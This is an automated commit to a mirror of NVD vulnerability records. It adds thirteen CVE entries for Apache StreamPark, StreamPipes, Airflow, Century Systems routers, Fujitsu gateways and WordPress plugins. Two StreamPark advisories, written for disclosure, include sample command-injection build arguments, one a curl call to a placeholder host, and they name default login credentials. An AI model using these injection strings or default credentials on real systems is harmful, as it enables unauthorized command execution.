Auto-Update: 2024-07-17T10:00:18.371008+00:00

This commit is contained in:
cad-safe-bot 2024-07-17 10:03:14 +00:00
parent 79b9236b5b
commit 8ba8af2fd1
16 changed files with 519 additions and 29 deletions

View File

@ -0,0 +1,33 @@
{
"id": "CVE-2023-52291",
"sourceIdentifier": "security@apache.org",
"published": "2024-07-17T09:15:02.410",
"lastModified": "2024-07-17T09:15:02.410",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nBackground:\n\nIn the \"Project\" module, the maven build args\u00a0\u00a0\u201c<\u201d operator causes command injection. e.g : \u201c< (curl\u00a0 http://xxx.com )\u201d will be executed as a command injection,\n\nMitigation:\n\nall users should upgrade to 2.1.4,\u00a0 The \"<\" operator will blocked\u3002\n\n"
}
],
"metrics": {},
"weaknesses": [
{
"source": "security@apache.org",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-77"
}
]
}
],
"references": [
{
"url": "https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf",
"source": "security@apache.org"
}
]
}

View File

@ -0,0 +1,33 @@
{
"id": "CVE-2024-29737",
"sourceIdentifier": "security@apache.org",
"published": "2024-07-17T09:15:02.527",
"lastModified": "2024-07-17T09:15:02.527",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\nBackground info:\n\nLog in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the \"Build Argument\". Note that there is no verification and interception of the special character \"`\". As a result, you will find that this injection command will be successfully executed after executing the build.\n\nIn the latest version, the special symbol ` is intercepted.\n\n"
}
],
"metrics": {},
"weaknesses": [
{
"source": "security@apache.org",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-77"
}
]
}
],
"references": [
{
"url": "https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5",
"source": "security@apache.org"
}
]
}

View File

@ -0,0 +1,33 @@
{
"id": "CVE-2024-30471",
"sourceIdentifier": "security@apache.org",
"published": "2024-07-17T09:15:02.640",
"lastModified": "2024-07-17T09:15:02.640",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration.\nThis allows an attacker to potentially request the creation of multiple accounts with the same email address until the email address is registered, creating many identical users and corrupting StreamPipe's user management.\nThis issue affects Apache StreamPipes: through 0.93.0.\n\nUsers are recommended to upgrade to version 0.95.0, which fixes the issue.\n\n"
}
],
"metrics": {},
"weaknesses": [
{
"source": "security@apache.org",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-367"
}
]
}
],
"references": [
{
"url": "https://lists.apache.org/thread/8yodrmohgcybq900or3d4hc1msl230fr",
"source": "security@apache.org"
}
]
}

View File

@ -0,0 +1,29 @@
{
"id": "CVE-2024-31070",
"sourceIdentifier": "vultures@jpcert.or.jp",
"published": "2024-07-17T09:15:02.813",
"lastModified": "2024-07-17T09:15:02.813",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Initialization of a resource with an insecure default vulnerability in FutureNet NXR series, VXR series and WXR series provided by Century Systems Co., Ltd. allows a remote unauthenticated attacker to access telnet service unlimitedly."
}
],
"metrics": {},
"references": [
{
"url": "https://jvn.jp/en/vu/JVNVU96424864/",
"source": "vultures@jpcert.or.jp"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html",
"source": "vultures@jpcert.or.jp"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html",
"source": "vultures@jpcert.or.jp"
}
]
}

View File

@ -0,0 +1,33 @@
{
"id": "CVE-2024-31979",
"sourceIdentifier": "security@apache.org",
"published": "2024-07-17T09:15:02.907",
"lastModified": "2024-07-17T09:15:02.907",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements.\nPreviously, StreamPipes allowed users to configure custom endpoints from which to install additional pipeline elements. \nThese endpoints were not properly validated, allowing an attacker to get StreamPipes to send an HTTP GET request to an arbitrary address.\nThis issue affects Apache StreamPipes: through 0.93.0.\n\nUsers are recommended to upgrade to version 0.95.0, which fixes the issue.\n\n"
}
],
"metrics": {},
"weaknesses": [
{
"source": "security@apache.org",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-918"
}
]
}
],
"references": [
{
"url": "https://lists.apache.org/thread/8lryp3bxnby9kmk13odkz2jbfdjfvf0y",
"source": "security@apache.org"
}
]
}

View File

@ -0,0 +1,29 @@
{
"id": "CVE-2024-36475",
"sourceIdentifier": "vultures@jpcert.or.jp",
"published": "2024-07-17T09:15:03.013",
"lastModified": "2024-07-17T09:15:03.013",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FutureNet NXR series, VXR series and WXR series provided by Century Systems Co., Ltd. contain an active debug code vulnerability. If a user who knows how to use the debug function logs in to the product, the debug function may be used and an arbitrary OS command may be executed."
}
],
"metrics": {},
"references": [
{
"url": "https://jvn.jp/en/vu/JVNVU96424864/",
"source": "vultures@jpcert.or.jp"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html",
"source": "vultures@jpcert.or.jp"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html",
"source": "vultures@jpcert.or.jp"
}
]
}

View File

@ -0,0 +1,29 @@
{
"id": "CVE-2024-36491",
"sourceIdentifier": "vultures@jpcert.or.jp",
"published": "2024-07-17T09:15:03.090",
"lastModified": "2024-07-17T09:15:03.090",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FutureNet NXR series, VXR series and WXR series provided by Century Systems Co., Ltd. allow a remote unauthenticated attacker to execute an arbitrary OS command, obtain and/or alter sensitive information, and be able to cause a denial of service (DoS) condition."
}
],
"metrics": {},
"references": [
{
"url": "https://jvn.jp/en/vu/JVNVU96424864/",
"source": "vultures@jpcert.or.jp"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html",
"source": "vultures@jpcert.or.jp"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html",
"source": "vultures@jpcert.or.jp"
}
]
}

View File

@ -0,0 +1,37 @@
{
"id": "CVE-2024-39863",
"sourceIdentifier": "security@apache.org",
"published": "2024-07-17T08:15:01.933",
"lastModified": "2024-07-17T08:15:01.933",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Apache Airflow versions before 2.9.3 have a vulnerability that allows an authenticated attacker to inject a malicious link when installing a provider. Users are recommended to upgrade to version 2.9.3, which fixes this issue.\n"
}
],
"metrics": {},
"weaknesses": [
{
"source": "security@apache.org",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
}
],
"references": [
{
"url": "https://github.com/apache/airflow/pull/40475",
"source": "security@apache.org"
},
{
"url": "https://lists.apache.org/thread/gxkvs279f1mbvckv5q65worr6how20o3",
"source": "security@apache.org"
}
]
}

View File

@ -0,0 +1,37 @@
{
"id": "CVE-2024-39877",
"sourceIdentifier": "security@apache.org",
"published": "2024-07-17T08:15:02.073",
"lastModified": "2024-07-17T08:15:02.073",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Apache Airflow 2.4.0, and versions before 2.9.3, has a vulnerability that allows authenticated DAG authors to craft a doc_md parameter in a way that could execute arbitrary code in the scheduler context, which should be forbidden according to the Airflow Security model. Users should upgrade to version 2.9.3 or later which has removed the vulnerability."
}
],
"metrics": {},
"weaknesses": [
{
"source": "security@apache.org",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-94"
}
]
}
],
"references": [
{
"url": "https://github.com/apache/airflow/pull/40522",
"source": "security@apache.org"
},
{
"url": "https://lists.apache.org/thread/1xhj9dkp37d6pzn24ll2mf94wbqnb2y1",
"source": "security@apache.org"
}
]
}

View File

@ -0,0 +1,25 @@
{
"id": "CVE-2024-40617",
"sourceIdentifier": "vultures@jpcert.or.jp",
"published": "2024-07-17T09:15:03.163",
"lastModified": "2024-07-17T09:15:03.163",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated attacker with User Class privilege sends a specially crafted request to the affected product, access restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked."
}
],
"metrics": {},
"references": [
{
"url": "https://fenics.fujitsu.com/networkservice/m2m/download/update-m.html",
"source": "vultures@jpcert.or.jp"
},
{
"url": "https://jvn.jp/en/jp/JVN25583987/",
"source": "vultures@jpcert.or.jp"
}
]
}

View File

@ -0,0 +1,56 @@
{
"id": "CVE-2024-5582",
"sourceIdentifier": "security@wordfence.com",
"published": "2024-07-17T08:15:02.180",
"lastModified": "2024-07-17T08:15:02.180",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'url' attribute within the Q&A Block widget in all versions up to, and including, 1.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "security@wordfence.com",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.1,
"impactScore": 2.7
}
]
},
"references": [
{
"url": "https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/tags/1.31/modules/elementor/widgets/qanda-block.php#L355",
"source": "security@wordfence.com"
},
{
"url": "https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/trunk/modules/elementor/widgets/class-qanda-block.php#L369",
"source": "security@wordfence.com"
},
{
"url": "https://wordpress.org/plugins/schema-and-structured-data-for-wp/#developers",
"source": "security@wordfence.com"
},
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ab650b99-ab15-4ddc-a622-cb43ab554ba7?source=cve",
"source": "security@wordfence.com"
}
]
}

View File

@ -0,0 +1,52 @@
{
"id": "CVE-2024-5703",
"sourceIdentifier": "security@wordfence.com",
"published": "2024-07-17T08:15:02.370",
"lastModified": "2024-07-17T08:15:02.370",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized API access due to a missing capability check in all versions up to, and including, 5.7.26. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access the API (provided it is enabled) and add, edit, and delete audience users."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "security@wordfence.com",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4
}
]
},
"references": [
{
"url": "https://plugins.trac.wordpress.org/browser/email-subscribers/trunk/lite/admin/class-es-rest-api-admin.php#L25",
"source": "security@wordfence.com"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3118326/email-subscribers/trunk/lite/admin/class-es-rest-api-admin.php",
"source": "security@wordfence.com"
},
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/22283650-36bf-43e5-a57e-a91025fb2af7?source=cve",
"source": "security@wordfence.com"
}
]
}

View File

@ -2,7 +2,7 @@
"id": "CVE-2024-6047",
"sourceIdentifier": "twcert@cert.org.tw",
"published": "2024-06-17T06:15:09.237",
"lastModified": "2024-06-17T14:15:13.040",
"lastModified": "2024-07-17T08:15:02.570",
"vulnStatus": "Awaiting Analysis",
"cveTags": [
{

View File

@ -0,0 +1,48 @@
{
"id": "CVE-2024-6220",
"sourceIdentifier": "security@wordfence.com",
"published": "2024-07-17T08:15:02.730",
"lastModified": "2024-07-17T08:15:02.730",
"vulnStatus": "Received",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The \u7b80\u6570\u91c7\u96c6\u5668 (Keydatas) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the keydatas_downloadImages function in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "security@wordfence.com",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
}
]
},
"references": [
{
"url": "https://plugins.trac.wordpress.org/browser/keydatas/trunk/keydatas.php",
"source": "security@wordfence.com"
},
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/49ae7971-7bdf-4369-b04b-fb48ea5b9518?source=cve",
"source": "security@wordfence.com"
}
]
}

View File

@ -13,13 +13,13 @@ Repository synchronizes with the NVD every 2 hours.
### Last Repository Update
```plain
2024-07-17T08:00:18.775605+00:00
2024-07-17T10:00:18.371008+00:00
```
### Most recent CVE Modification Timestamp synchronized with NVD
```plain
2024-07-17T07:15:03.873000+00:00
2024-07-17T09:15:03.163000+00:00
```
### Last Data Feed Release
@ -33,30 +33,33 @@ Download and Changelog: [Click](https://github.com/fkie-cad/nvd-json-data-feeds/
### Total Number of included CVEs
```plain
257347
257360
```
### CVEs added in the last Commit
Recently added CVEs: `11`
Recently added CVEs: `13`
- [CVE-2024-41009](CVE-2024/CVE-2024-410xx/CVE-2024-41009.json) (`2024-07-17T07:15:01.973`)
- [CVE-2024-41010](CVE-2024/CVE-2024-410xx/CVE-2024-41010.json) (`2024-07-17T07:15:02.183`)
- [CVE-2024-5251](CVE-2024/CVE-2024-52xx/CVE-2024-5251.json) (`2024-07-17T07:15:02.260`)
- [CVE-2024-5252](CVE-2024/CVE-2024-52xx/CVE-2024-5252.json) (`2024-07-17T07:15:02.483`)
- [CVE-2024-5253](CVE-2024/CVE-2024-52xx/CVE-2024-5253.json) (`2024-07-17T07:15:02.690`)
- [CVE-2024-5254](CVE-2024/CVE-2024-52xx/CVE-2024-5254.json) (`2024-07-17T07:15:02.883`)
- [CVE-2024-5255](CVE-2024/CVE-2024-52xx/CVE-2024-5255.json) (`2024-07-17T07:15:03.073`)
- [CVE-2024-6033](CVE-2024/CVE-2024-60xx/CVE-2024-6033.json) (`2024-07-17T07:15:03.263`)
- [CVE-2024-6467](CVE-2024/CVE-2024-64xx/CVE-2024-6467.json) (`2024-07-17T07:15:03.493`)
- [CVE-2024-6660](CVE-2024/CVE-2024-66xx/CVE-2024-6660.json) (`2024-07-17T07:15:03.683`)
- [CVE-2024-6669](CVE-2024/CVE-2024-66xx/CVE-2024-6669.json) (`2024-07-17T07:15:03.873`)
- [CVE-2023-52291](CVE-2023/CVE-2023-522xx/CVE-2023-52291.json) (`2024-07-17T09:15:02.410`)
- [CVE-2024-29737](CVE-2024/CVE-2024-297xx/CVE-2024-29737.json) (`2024-07-17T09:15:02.527`)
- [CVE-2024-30471](CVE-2024/CVE-2024-304xx/CVE-2024-30471.json) (`2024-07-17T09:15:02.640`)
- [CVE-2024-31070](CVE-2024/CVE-2024-310xx/CVE-2024-31070.json) (`2024-07-17T09:15:02.813`)
- [CVE-2024-31979](CVE-2024/CVE-2024-319xx/CVE-2024-31979.json) (`2024-07-17T09:15:02.907`)
- [CVE-2024-36475](CVE-2024/CVE-2024-364xx/CVE-2024-36475.json) (`2024-07-17T09:15:03.013`)
- [CVE-2024-36491](CVE-2024/CVE-2024-364xx/CVE-2024-36491.json) (`2024-07-17T09:15:03.090`)
- [CVE-2024-39863](CVE-2024/CVE-2024-398xx/CVE-2024-39863.json) (`2024-07-17T08:15:01.933`)
- [CVE-2024-39877](CVE-2024/CVE-2024-398xx/CVE-2024-39877.json) (`2024-07-17T08:15:02.073`)
- [CVE-2024-40617](CVE-2024/CVE-2024-406xx/CVE-2024-40617.json) (`2024-07-17T09:15:03.163`)
- [CVE-2024-5582](CVE-2024/CVE-2024-55xx/CVE-2024-5582.json) (`2024-07-17T08:15:02.180`)
- [CVE-2024-5703](CVE-2024/CVE-2024-57xx/CVE-2024-5703.json) (`2024-07-17T08:15:02.370`)
- [CVE-2024-6220](CVE-2024/CVE-2024-62xx/CVE-2024-6220.json) (`2024-07-17T08:15:02.730`)
### CVEs modified in the last Commit
Recently modified CVEs: `0`
Recently modified CVEs: `1`
- [CVE-2024-6047](CVE-2024/CVE-2024-60xx/CVE-2024-6047.json) (`2024-07-17T08:15:02.570`)
## Download and Usage

View File

@ -238453,6 +238453,7 @@ CVE-2023-52288,0,0,297c3e93d2578fa4354d42073bbfcc9c84a93418874a891bfd157ba56fb9c
CVE-2023-52289,0,0,b0b62bf64cde12eff577800bdca9d7c0c719bc9a23d6c24a235e18254584af67,2024-01-24T18:48:24.283000
CVE-2023-5229,0,0,96ae4a14c7f75bcf2b6cbe69f7946f8795ec64211a57e06d1e0d2d6ff05a7656,2023-11-08T18:35:10.590000
CVE-2023-52290,0,0,b027d3a77e3918cc6823c1648721e9d0ca22799d7375d42fe7f068b3c1f18fba,2024-07-16T13:43:58.773000
CVE-2023-52291,1,1,62b19fa704ecae2c8dc0031950e39edea10a55b8751c9c99de83ab6a950ad510,2024-07-17T09:15:02.410000
CVE-2023-52296,0,0,85a5b959f2db874145dc7271afa4c982911881063ce8b8741fd891792d7a0806,2024-06-10T17:16:16.537000
CVE-2023-5230,0,0,a536f5ec0e596e59d6ed211c038722ef9594f65abf67a435dc22663a31135f5f,2023-11-07T04:23:38.493000
CVE-2023-52302,0,0,22ea8ee42f1d0c97611b1d0c11616324d4f2cec9c11a2c69cd863452202dca24,2024-01-05T12:14:39.403000
@ -248959,6 +248960,7 @@ CVE-2024-29732,0,0,e30fc06180575c1796869bb0b4fa02497c40c6d7939d34aba0362f12c2710
CVE-2024-29733,0,0,0811972ef853088b726fd2b07316244d1d628e55e310910ac8174bd65d097612,2024-07-03T01:52:30.320000
CVE-2024-29734,0,0,65bb1ba04f673142d3081922c5e4533cd4af140db3cdfbbce09ab73848e3b6c3,2024-04-03T12:38:04.840000
CVE-2024-29735,0,0,1c27e1fe9dbb50907062f908fab6fbb55a16239f685d6be40b04c11200e2a361,2024-05-01T19:15:23.573000
CVE-2024-29737,1,1,abee47fe398bb76f7f243555e81bf7a2f13c2526bbc00b1a6baf3ad1e78684ea,2024-07-17T09:15:02.527000
CVE-2024-29738,0,0,1c3e1564461702d87cd213d777f3523814ac3c73b5cc61bff5ae595e06e0fbeb,2024-04-08T18:49:25.863000
CVE-2024-29739,0,0,ff7d8db191ec3bc24b9fd0a0e51d4426e2f32708f8ba1a8e8a840affcd32aeb7,2024-04-08T18:49:25.863000
CVE-2024-2974,0,0,f10703d4490e9d3ed63c6b4abd6c9bf87d6d9b2c11e56d030e360944602d03aa,2024-04-10T13:23:38.787000
@ -249655,6 +249657,7 @@ CVE-2024-30468,0,0,657b19720c7a7f72ce29247c42940126c9b095c85b3af6afa14cec4927288
CVE-2024-30469,0,0,5f60e05589c3ee2464f9657ee501b05ffdf6e5d6a13b3d79ce37326fbe7f6667,2024-04-01T01:12:59.077000
CVE-2024-3047,0,0,b22e2b3bd3f2ea2e1a9b8967138f5d24af468217212d0308948532706a31b398,2024-05-02T18:00:37.360000
CVE-2024-30470,0,0,48e5d66dc273af24da4e4b7519926c3e97f1d38856b041954b60e69533ae4645,2024-06-10T02:52:08.267000
CVE-2024-30471,1,1,bab2c9efe7e710556c873bd56d11e5580a5090baf8adfd2fc81152a538f625d6,2024-07-17T09:15:02.640000
CVE-2024-30472,0,0,00bb1b58fdab892a36ea40136ac2fa59e308dd9cc355f92e428b81257afaa77e,2024-06-13T18:35:19.777000
CVE-2024-30477,0,0,2a9c94bd63166efd66be5d42497334130f49f4b0acff68b2e8385a53a877c218,2024-04-01T01:12:59.077000
CVE-2024-30478,0,0,8648debe6405c1216a86c901736f7e8905eccc7e01f0ae6ab2126aef21a3be15,2024-04-01T01:12:59.077000
@ -250007,6 +250010,7 @@ CVE-2024-31064,0,0,09fc7c8df13203efb1ca9057b678e29517d4a825c266b7d99eb7440ce2a3e
CVE-2024-31065,0,0,7a59dbe54933bf84c1cc682e8d045b6969f111bdbc4c97f8279c44771dded5df,2024-03-28T20:53:20.813000
CVE-2024-31069,0,0,36481f1718994048a20a15ed67941e1a51f806f748a1e21efe82cd82687004ae,2024-04-15T13:15:51.577000
CVE-2024-3107,0,0,26336691309b77f9b9ed1d01af8da80f39f18aa81e7e280fa98e64adbe096bda,2024-05-02T18:00:37.360000
CVE-2024-31070,1,1,0163dd520ae494ecf8899eea3488e5c2fc1bd852069703b4b9690ddd9000a756,2024-07-17T09:15:02.813000
CVE-2024-31071,0,0,38e67c605bc28fae8948bdb29e4e1fea108746bc02f8e7ba298a38c41a90d442,2024-07-03T18:01:57.697000
CVE-2024-31076,0,0,b516579659528296f384d5fc2847472b67a1e9cb8089efce1b81514ba7455edc,2024-07-15T07:15:03.810000
CVE-2024-31077,0,0,2f0093d39cf5c7659611f858795c8621f6dfa183946b9e96395aae4eaaeca6eb,2024-04-23T12:52:09.397000
@ -250606,6 +250610,7 @@ CVE-2024-31967,0,0,d11e85355b08311754a29e0c672ae95e7ac529a4f49e30497f6cb09093fb9
CVE-2024-3197,0,0,324c7a8dc9ccea612ec0432519a90414016d01b55429c0b6dc09fc2cc5af230b,2024-05-02T18:00:37.360000
CVE-2024-31974,0,0,eb64c7f63099840683d53752791541217d3c4d0792dfc9b0d9b46ea3d72b30e4,2024-07-03T01:55:41.323000
CVE-2024-31978,0,0,e4cc4367e420e8dcd4ef937e3967f9710a2baec19b8785bc53e2d6ca59645c6f,2024-04-09T12:48:04.090000
CVE-2024-31979,1,1,6b14c84ffc58edd58a41ecfbd5160fff2143fc78b2cb21639cdb3e6a54c014f1,2024-07-17T09:15:02.907000
CVE-2024-3198,0,0,1f0d31c07f6270b253d2bb83c7332c7bc9f718736230fc6377e93749d92894d3,2024-05-22T12:46:53.887000
CVE-2024-31980,0,0,8ab930dfc3ea6340441974ba1513ac76de68c0a2890d2d81a8d5be8805e25064,2024-05-14T19:18:31.490000
CVE-2024-31981,0,0,f2d3a632894e526ffc79a652f25d3a7da1db8610794379510e264c8e37958abd,2024-04-11T12:47:44.137000
@ -253538,6 +253543,7 @@ CVE-2024-36470,0,0,05049c8242b38f083734214f212efa24bf0b8e7684b3d943061a8cbb7c06a
CVE-2024-36471,0,0,6e10c8a6f7211dd42a1163cc28818f3c443a2860a609ca58841954b595f68033,2024-07-03T02:03:13.647000
CVE-2024-36472,0,0,2535bb51ccaa28f537e77e0ccd5fbdc4d19f82667f3e7465a3e9bc19e2a787a8,2024-05-28T17:11:47.007000
CVE-2024-36473,0,0,aa04ebf30531a2d8b8fe44f55c5d2b24e6cb3b712da23e42c688962416c1c553,2024-06-11T13:54:12.057000
CVE-2024-36475,1,1,7ed238432d05eb271990281df74f025e6cc8942b35a974274c6e54341354fecc,2024-07-17T09:15:03.013000
CVE-2024-36477,0,0,1d17ae62300b2d07c5941459ecfc6e574f91510a7910b453c64417a36e5b6766,2024-06-24T18:38:40.737000
CVE-2024-36478,0,0,3d7ccc3e5e506ff24ae4133973c4756e3313941d8345b88b77b0a392d064c726,2024-06-21T11:22:01.687000
CVE-2024-36479,0,0,dee4352def0751c2293c7f9148494e529c22ac95426bcab70e58c8c955d6c7c4,2024-06-24T19:26:47.037000
@ -253547,6 +253553,7 @@ CVE-2024-36481,0,0,c20069fe9216cf7ae5e42e62fc886e320b7997d027cb5be79eafe3b725910
CVE-2024-36484,0,0,b7f6e9f2300585891eaa5f57928160b50fffe9b2c3ba452d5f6777346d3497a0,2024-06-21T11:22:01.687000
CVE-2024-36489,0,0,dc2f7108dc3678f1fb36a70c7ba7637636e10430721a5dfcf0db7d3d728d6d70,2024-06-21T11:22:01.687000
CVE-2024-3649,0,0,9d2e0b18ffe30ccf7cbc0e74a77daf1869af9483d0413cb80580942eae7d40a2,2024-05-02T18:00:37.360000
CVE-2024-36491,1,1,bee8271f86d23d3c668c3502644384e1a0cb386889748b2f6837aaba8e75afd3,2024-07-17T09:15:03.090000
CVE-2024-36495,0,0,10404a83be52d267985f87debff962346c26dcdc9e1b293bd8df22829bd96214,2024-07-08T14:18:38.843000
CVE-2024-36496,0,0,9b0852e2079a2b8f81e66f1c652acdc8b58764ac010cd86aadd442eb8de70d88,2024-07-03T02:03:14.090000
CVE-2024-36497,0,0,55716469f26311eaa7b551ebbfe7eab2676d8944c191b597609bbd8dff1f73b6,2024-07-03T02:03:14.280000
@ -255071,6 +255078,7 @@ CVE-2024-39846,0,0,cc3d14fb15e20c985bb7fdeb359e7a12ea1918f79b7c4c3ac03373ad528c6
CVE-2024-39848,0,0,8178bbb2814e5fa60c3351f00827b86e4d6b7b334f71560f5ea323ec84986fcf,2024-07-03T02:05:53.147000
CVE-2024-3985,0,0,ceb8b898ec23867d1efcc4d7f7a630f584432f67007c6b07d5fd8199e1841622,2024-05-02T18:00:37.360000
CVE-2024-39853,0,0,0a0a7ef09f69a0d0504c74e5034409e9f17837e69e722a4f1f3c2adcfb998667,2024-07-03T02:05:53.353000
CVE-2024-39863,1,1,3ee723b3a0c5125399d16a11c9512cee9b9c778f3dc938dfafec6e536a9c710a,2024-07-17T08:15:01.933000
CVE-2024-39864,0,0,d53cf864986adcf58f762cd7c857169d0cf77d7c01b84f977b101e751257847c,2024-07-08T15:47:10.990000
CVE-2024-39865,0,0,1431947f48c63c3f2f289bcb05288d0cda08dff5370e915fbcca9f419224f5d7,2024-07-09T18:19:14.047000
CVE-2024-39866,0,0,4ed5613c5836c63f5d6549bcb87208902b3beb2ec94b1529e5dacfcf651468b3,2024-07-09T18:19:14.047000
@ -255085,6 +255093,7 @@ CVE-2024-39873,0,0,1a658b8037abfbe3e91b7510442ac4e5e9ef0d1495c2ad87b92c1ad50704c
CVE-2024-39874,0,0,14f6ca6c361900eb9cffe6fab1a9a6cec695e772018ab46292846bfaeafee4e4,2024-07-09T18:19:14.047000
CVE-2024-39875,0,0,7360bfd27b057e62564bd92359532fb7ec6b0e60daa411b44b0868522210c380,2024-07-09T18:19:14.047000
CVE-2024-39876,0,0,b618a8de6e7bfd8c90ec2968f20d226ce35ab815fa49f40d9bc6faad3fe37973,2024-07-09T18:19:14.047000
CVE-2024-39877,1,1,2dd18cb0b88e6a0324377a5b3b12d23db63fbeca30132a0cd8cd7be0689f19f6,2024-07-17T08:15:02.073000
CVE-2024-39878,0,0,038c252a5df59aef0ff494dd466e8c23160164cb5ac894aeb1a33e06001b79d4,2024-07-02T12:09:16.907000
CVE-2024-39879,0,0,1b030ce3798bca0bad33a3937cca95b776786d7918bf02f25bff668e667acaa0,2024-07-02T12:09:16.907000
CVE-2024-3988,0,0,517f8158b252993c28722d017d1da97b60c9d30d3cb2f421d187823784125569,2024-04-25T13:18:13.537000
@ -255251,6 +255260,7 @@ CVE-2024-40604,0,0,96707551e8fc94b334085d5bf2926e369955211afc96673efa337699ead3d
CVE-2024-40605,0,0,3b7d08be38342ed975d3a802af7734eccce4b6fa70dd407ef7f8c6cca68429e4,2024-07-09T16:09:30.277000
CVE-2024-4061,0,0,3d64526f6b4051e690acf87533a742bc5fa8b9683de463655fd6184fe7fa5bfb,2024-05-21T12:37:59.687000
CVE-2024-40614,0,0,5a8c90c94f1b0dc56355424420ebae65c618d536c580acb4e248f7802de2136c,2024-07-10T13:15:10.833000
CVE-2024-40617,1,1,656b360985193ec4b40c91a0040f362a6e595795c29738b7048f16eedba12e75,2024-07-17T09:15:03.163000
CVE-2024-40618,0,0,339cc634a42e8a7db54f4bb39e56482affa65b57dfd2765250a61f2e694456da,2024-07-12T16:12:00.597000
